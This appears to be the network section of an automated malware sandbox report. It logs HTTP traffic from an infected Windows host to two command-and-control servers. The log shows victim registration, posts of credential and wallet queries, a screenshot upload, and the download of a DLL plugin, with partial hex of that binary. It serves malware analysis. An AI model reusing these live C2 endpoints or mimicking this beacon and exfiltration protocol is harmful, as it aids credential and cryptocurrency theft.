Dec 13, 2024 01:37:30.873908997 CET	1236	IN	Data Raw: 12 00 0f af f7 03 f0 03 b5 bc 00 00 00 44 03 ee 8b 43 28 41 ff c4 49 83 c7 20 44 3b e0 7c a0 48 8b 6c 24 20 4c 8b 7c 24 28 4c 8b 64 24 58 41 8b fe 85 c0 7e 34 49 8b f6 0f 1f 80 00 00 00 00 48 8b 43 20 48 8b 4c 30 08 48 85 c9 74 11 44 38 71 11 74 Data Ascii: DC(AI D;\|Hl$ L\|$(Ld$XA~4IHC HL0HtD8qtiuAXH ;{(\|E/Ll$PDuC(ADt$0~5IHC HL8HtD8qtAD8qu>XC(H ;\|HL$0EH IHC Ht(H
Dec 13, 2024 01:37:30.993978024 CET	1236	IN	Data Raw: 48 8d 4b 01 e8 a2 fe ff ff 83 f8 01 0f 85 7f 01 00 00 48 83 c3 03 80 3b 2e 75 65 0f b6 4b 01 42 f6 04 31 04 74 5a f2 0f 10 15 9d 58 11 00 48 ff c3 f2 0f 10 1d a2 58 11 00 f2 0f 10 25 b2 58 11 00 66 66 0f 1f 84 00 00 00 00 00 0f be c1 48 ff c3 f2 Data Ascii: HKH;.ueKB1tZXHX%XffHYYfnB0X\u^\|$`D$dfnD$`FD$hfF)FXF B0tffCHB0u~-u+ukHD$pAHD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49754	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:29.625463963 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:37:29.748852015 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:37:31.247997046 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:30 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49758	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:31.490396023 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:37:31.611481905 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:37:32.939009905 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:32 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49762	185.81.68.147	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:32.471972942 CET	309	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
Dec 13, 2024 01:37:33.827222109 CET	502	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:33 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 303 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 31 30 30 30 30 38 31 30 32 30 31 2b 2b 2b 38 33 63 30 64 38 32 31 35 34 33 30 62 66 62 62 35 31 63 62 32 66 64 33 33 30 37 63 39 36 62 30 63 62 33 31 63 34 66 36 64 33 66 62 64 65 36 32 62 32 66 65 61 34 38 33 23 31 30 30 30 30 38 32 30 31 30 31 2b 2b 2b 38 33 63 30 64 38 32 31 35 34 33 30 62 66 66 39 30 30 38 61 36 34 63 35 36 32 33 64 63 64 61 37 38 33 36 66 39 63 61 35 39 39 66 63 38 31 36 33 61 62 65 66 65 66 63 38 66 64 63 39 64 66 23 31 30 30 30 30 38 33 30 31 30 31 2b 2b 2b 38 33 63 30 64 38 32 31 35 34 33 30 62 66 66 39 30 30 38 61 36 34 63 35 36 32 33 64 63 64 61 37 38 33 36 66 39 63 61 35 39 39 66 63 38 31 36 33 61 62 65 66 65 66 63 38 66 64 63 39 64 66 23 31 30 30 30 30 38 34 30 31 30 31 2b 2b 2b 38 33 63 30 64 38 32 31 35 34 33 30 62 66 66 39 30 30 38 61 36 34 63 35 36 32 33 64 63 64 61 37 38 33 36 66 39 63 61 35 39 39 66 61 38 32 36 30 65 34 66 65 66 32 38 33 23 3c 64 3e Data Ascii: <c>10000810201+++83c0d8215430bfbb51cb2fd3307c96b0cb31c4f6d3fbde62b2fea483#10000820101+++83c0d8215430bff9008a64c5623dcda7836f9ca599fc8163abefefc8fdc9df#10000830101+++83c0d8215430bff9008a64c5623dcda7836f9ca599fc8163abefefc8fdc9df#10000840101+++83c0d8215430bff9008a64c5623dcda7836f9ca599fa8260e4fef283#<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49761	185.81.68.148	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:32.472117901 CET	312	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
Dec 13, 2024 01:37:33.820683956 CET	746	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:33 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 547 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 62 72 20 2f 3e 0a 3c 62 3e 46 61 74 61 6c 20 65 72 72 6f 72 3c 2f 62 3e 3a 20 20 55 6e 63 61 75 67 68 74 20 6d 79 73 71 6c 69 5f 73 71 6c 5f 65 78 63 65 70 74 69 6f 6e 3a 20 44 75 70 6c 69 63 61 74 65 20 65 6e 74 72 79 20 27 32 34 36 31 32 32 36 35 38 33 36 39 27 20 66 6f 72 20 6b 65 79 20 27 50 52 49 4d 41 52 59 27 20 69 6e 20 43 3a 5c 78 61 6d 70 70 5c 68 74 64 6f 63 73 5c 38 46 76 75 35 6a 68 34 44 62 53 5c 46 75 6e 63 74 69 6f 6e 73 2e 70 68 70 3a 31 35 31 0a 53 74 61 63 6b 20 74 72 61 63 65 3a 0a 23 30 20 43 3a 5c 78 61 6d 70 70 5c 68 74 64 6f 63 73 5c 38 46 76 75 35 6a 68 34 44 62 53 5c 46 75 6e 63 74 69 6f 6e 73 2e 70 68 70 28 31 35 31 29 3a 20 6d 79 73 71 6c 69 5f 71 75 65 72 79 28 4f 62 6a 65 63 74 28 6d 79 73 71 6c 69 29 2c 20 27 49 4e 53 45 52 54 20 49 4e 54 4f 20 60 75 6e 2e 2e 2e 27 29 0a 23 31 20 43 3a 5c 78 61 6d 70 70 5c 68 74 64 6f 63 73 5c 38 46 76 75 35 6a 68 34 44 62 53 5c 69 6e 64 65 78 2e 70 68 70 28 31 35 39 29 3a 20 41 64 64 54 6f 42 61 73 65 28 27 32 34 36 31 32 32 36 [TRUNCATED] Data Ascii: <br /><b>Fatal error</b>: Uncaught mysqli_sql_exception: Duplicate entry '246122658369' for key 'PRIMARY' in C:\xampp\htdocs\8Fvu5jh4DbS\Functions.php:151Stack trace:#0 C:\xampp\htdocs\8Fvu5jh4DbS\Functions.php(151): mysqli_query(Object(mysqli), 'INSERT INTO `un...')#1 C:\xampp\htdocs\8Fvu5jh4DbS\index.php(159): AddToBase('246122658369', '0f3be6', '0', '5.10', 'User', 'x64', 'Windows 10', 'WinDefender', '927537', 'user', 'Workgroup', '1')#2 {main} thrown in <b>C:\xampp\htdocs\8Fvu5jh4DbS\Functions.php</b> on line <b>151</b><br />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49763	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:33.187673092 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:37:33.310187101 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:37:34.811338902 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:33 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49769	185.81.68.147	80	6664	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:34.738554001 CET	173	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 21 Cache-Control: no-cache Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
Dec 13, 2024 01:37:36.069933891 CET	198	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:35 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 1 Content-Type: text/html; charset=UTF-8 Data Raw: 20 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49770	185.81.68.147	80	2164	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:34.845196009 CET	173	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 21 Cache-Control: no-cache Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
Dec 13, 2024 01:37:36.156397104 CET	198	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:35 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 1 Content-Type: text/html; charset=UTF-8 Data Raw: 20 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49771	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:35.047310114 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:37:35.167045116 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:37:36.665479898 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:35 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49772	185.81.68.147	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:35.251979113 CET	66	OUT	GET /7vhfjke3/Plugins/clip64.dll HTTP/1.1 Host: 185.81.68.147
Dec 13, 2024 01:37:36.578839064 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:35 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Thu, 12 Dec 2024 18:53:40 GMT ETag: "1f000-629173b87b500" Accept-Ranges: bytes Content-Length: 126976 Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c8 f9 ef 50 8c 98 81 03 8c 98 81 03 8c 98 81 03 98 f3 82 02 86 98 81 03 98 f3 84 02 05 98 81 03 98 f3 85 02 9e 98 81 03 de ed 85 02 83 98 81 03 de ed 82 02 9d 98 81 03 de ed 84 02 ad 98 81 03 98 f3 80 02 8b 98 81 03 8c 98 80 03 ed 98 81 03 40 ed 88 02 8f 98 81 03 40 ed 81 02 8d 98 81 03 40 ed 7e 03 8d 98 81 03 40 ed 83 02 8d 98 81 03 52 69 63 68 8c 98 81 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 84 96 5a 67 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 1d 00 44 01 00 00 b4 00 00 00 00 00 00 62 70 00 00 00 10 00 00 00 60 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$P@@@~@RichPELZg!Dbp`0@P8@`L.textCD `.rdata*u`vH@@.data@.rsrc@@.reloc@B
Dec 13, 2024 01:37:36.578989983 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 20 68 98 ae 01 10 b9 60 e8 01 10 e8 7f 4d 00 00 68 70 29 01 Data Ascii: j h`Mhp)ZYj hx_Mh)ZYjh?Mh0ZYj hMhZYjhLh*jZYjh
Dec 13, 2024 01:37:36.579004049 CET	1236	IN	Data Raw: 24 af 01 10 b9 d8 e8 01 10 e8 df 4c 00 00 68 50 2b 01 10 e8 4a 5a 00 00 59 c3 cc cc cc 6a 14 68 44 af 01 10 b9 f0 e8 01 10 e8 bf 4c 00 00 68 b0 2b 01 10 e8 2a 5a 00 00 59 c3 cc cc cc 6a 20 68 5c af 01 10 b9 08 e9 01 10 e8 9f 4c 00 00 68 10 2c 01 Data Ascii: $LhP+JZYjhDLh+*ZYj h\Lh,ZYjh} Lhp,YYjh}8_Lh,YYjhP?Lh0-YYjhhLh-YYjhKh-
Dec 13, 2024 01:37:36.579209089 CET	1236	IN	Data Raw: 8a 55 00 00 59 c3 cc cc cc 6a 00 68 7d af 01 10 b9 80 ec 01 10 e8 ff 47 00 00 68 f0 39 01 10 e8 6a 55 00 00 59 c3 cc cc cc 6a 0c 68 e0 b2 01 10 b9 98 ec 01 10 e8 df 47 00 00 68 50 3a 01 10 e8 4a 55 00 00 59 c3 cc cc cc 6a 14 68 f0 b2 01 10 b9 b0 Data Ascii: UYjh}Gh9jUYjhGhP:JUYjhGh:*UYjhGh;UYjhGhp;TYjLhX_Gh;TYjh?Gh0<TYjdh(
Dec 13, 2024 01:37:36.579224110 CET	1236	IN	Data Raw: 10 e8 3f 43 00 00 68 30 48 01 10 e8 aa 50 00 00 59 c3 cc cc cc 6a 0c 68 0c b7 01 10 b9 28 f0 01 10 e8 1f 43 00 00 68 90 48 01 10 e8 8a 50 00 00 59 c3 cc cc cc 6a 34 68 1c b7 01 10 b9 40 f0 01 10 e8 ff 42 00 00 68 f0 48 01 10 e8 6a 50 00 00 59 c3 Data Ascii: ?Ch0HPYjh(ChHPYj4h@BhHjPYj(hTXBhPIJPYjhpBhI*PYj<hBhJPYj0hBhpJOYjh_BhJOY
Dec 13, 2024 01:37:36.579238892 CET	672	IN	Data Raw: 05 00 00 83 7d 30 00 0f 84 02 05 00 00 83 7d 48 00 0f 84 f8 04 00 00 c7 85 d8 fb ff ff 00 00 00 00 c7 85 e8 fb ff ff 00 00 00 00 c7 85 ec fb ff ff 0f 00 00 00 c6 85 d8 fb ff ff 00 c6 45 fc 03 8d 8d c0 fb ff ff 6a 2f c7 85 c0 fb ff ff 00 00 00 00 Data Ascii: }0}HEj/h$=jjjjhTE0a}jjjjjECEjPPQ4a}4jjjjjE CE PhXQ8a}LM8uHCM8
Dec 13, 2024 01:37:36.579344988 CET	1236	IN	Data Raw: 83 c1 23 2b c7 83 c0 fc 83 f8 1f 0f 87 1f 03 00 00 51 57 e8 c8 45 00 00 83 c4 08 c6 45 fc 04 8b 95 8c fb ff ff 83 fa 10 72 2f 8b 8d 78 fb ff ff 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 e1 02 00 00 52 51 e8 Data Ascii: #+QWEEr/xBrI#+RQE=PhPV@aV5DaGG~f
Dec 13, 2024 01:37:36.579360962 CET	1236	IN	Data Raw: 23 2b c1 83 c0 fc 83 f8 1f 77 7a 52 51 e8 fa 40 00 00 83 c4 08 c7 45 fc ff ff ff ff 8b 55 e0 c7 45 c4 00 00 00 00 c7 45 c8 0f 00 00 00 c6 45 b4 00 83 fa 10 72 28 8b 4d cc 42 8b c1 81 fa 00 10 00 00 72 10 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f Data Ascii: #+wzRQ@EUEEEr(MBrI#+w1RQ@tuSMdY_^M3}@]rUjh#dPH3EVWPEd}}EGGEE}4
Dec 13, 2024 01:37:36.579477072 CET	1236	IN	Data Raw: 00 8d 4d e0 83 c4 04 8d b7 00 04 00 00 89 75 ec 3b 01 75 12 68 00 04 00 00 6a 00 57 e8 e8 51 00 00 83 c4 0c eb 0a b9 00 01 00 00 83 c8 ff f3 ab 89 75 e8 c7 45 fc 01 00 00 00 33 d2 0f be 8a 60 ba 01 10 8b 45 e4 89 14 88 42 83 fa 40 7c ed 8b 45 d4 Data Ascii: Mu;uhjWQuE3`EB@\|E3M3U~9Pv}DxErEt\xFKU;Ks{ACrDuEuQ4MUEBU;Prt,U+
Dec 13, 2024 01:37:36.579493999 CET	1236	IN	Data Raw: 00 c7 46 10 00 00 00 00 c7 46 14 0f 00 00 00 89 4d cc c6 06 00 bb 01 00 00 00 33 ff 89 5d d0 85 c9 0f 8e e7 00 00 00 c7 45 d4 00 00 00 00 c7 45 e4 00 00 00 00 c7 45 e8 0f 00 00 00 c6 45 d4 00 3b c7 0f 82 14 01 00 00 2b c7 b9 02 00 00 00 3b c1 0f Data Ascii: FFM3]EEEE;+;B}ECEQMP,]EE}jCEjPmNV];sAFrDuEuQ/EUr(MBrI#+wpRQ
Dec 13, 2024 01:37:36.698633909 CET	1236	IN	Data Raw: f8 1f 77 1e 52 51 e8 85 32 00 00 83 c4 08 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 e8 a6 64 00 00 cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 f5 25 01 10 64 a1 00 00 00 00 50 83 ec 3c a1 08 e0 01 10 33 c5 89 45 f0 56 57 50 Data Ascii: wRQ2MdY_^[]dUjh%dP<3EVWPEdEMj$EhEEE'EEu33fffEEEE;u+;B}ECEQMP'

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49773	185.81.68.148	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:35.588182926 CET	158	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 01:37:36.914177895 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:36 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49775	185.81.68.147	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:35.781919003 CET	170	OUT	POST /7vhfjke3/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----ODU4NzA= Host: 185.81.68.147 Content-Length: 86022 Cache-Control: no-cache
Dec 13, 2024 01:37:35.781959057 CET	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 44 55 34 4e 7a 41 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------ODU4NzA=Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Dec 13, 2024 01:37:35.782016993 CET	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Dec 13, 2024 01:37:35.782016993 CET	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Dec 13, 2024 01:37:35.782051086 CET	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Dec 13, 2024 01:37:35.782084942 CET	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Dec 13, 2024 01:37:35.782085896 CET	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Dec 13, 2024 01:37:35.782123089 CET	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Dec 13, 2024 01:37:35.782123089 CET	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Dec 13, 2024 01:37:35.782157898 CET	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Dec 13, 2024 01:37:35.782191038 CET	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Dec 13, 2024 01:37:37.634553909 CET	198	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:36 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 1 Content-Type: text/html; charset=UTF-8 Data Raw: 20 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49780	185.81.68.148	80	6664	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:36.224050999 CET	176	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 21 Cache-Control: no-cache Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
Dec 13, 2024 01:37:37.538552999 CET	198	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:36 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 1 Content-Type: text/html; charset=UTF-8 Data Raw: 20 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49781	185.81.68.148	80	2164	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:36.352488995 CET	176	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 21 Cache-Control: no-cache Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
Dec 13, 2024 01:37:37.687397957 CET	198	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:37 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 1 Content-Type: text/html; charset=UTF-8 Data Raw: 20 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49782	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:36.893455982 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:37:37.013684988 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:37:38.488281012 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:37 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49783	185.81.68.147	80	3876	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:37.792069912 CET	156	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 5 Cache-Control: no-cache Data Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Dec 13, 2024 01:37:39.178134918 CET	711	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:38 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 512 Content-Type: text/html; charset=UTF-8 Data Raw: 20 2b 2b 2b 5f 31 5f 64 61 38 30 66 39 36 39 30 35 37 32 65 31 39 38 36 31 38 62 31 39 62 61 33 64 32 34 61 64 64 37 63 39 36 61 66 39 65 62 38 35 65 32 38 35 37 35 62 62 65 39 65 64 64 35 63 62 64 33 63 64 61 32 64 66 33 36 2d 31 2d 5f 32 5f 64 62 63 63 63 65 36 31 35 62 37 61 66 35 66 62 35 63 38 66 37 33 63 65 36 61 37 30 39 39 61 65 39 34 36 39 39 64 61 34 64 37 62 30 63 30 33 36 61 66 61 61 62 63 64 65 61 62 38 30 38 38 65 36 62 39 37 37 33 34 64 38 62 33 35 62 33 63 64 30 39 31 38 65 2d 32 2d 5f 33 5f 61 37 65 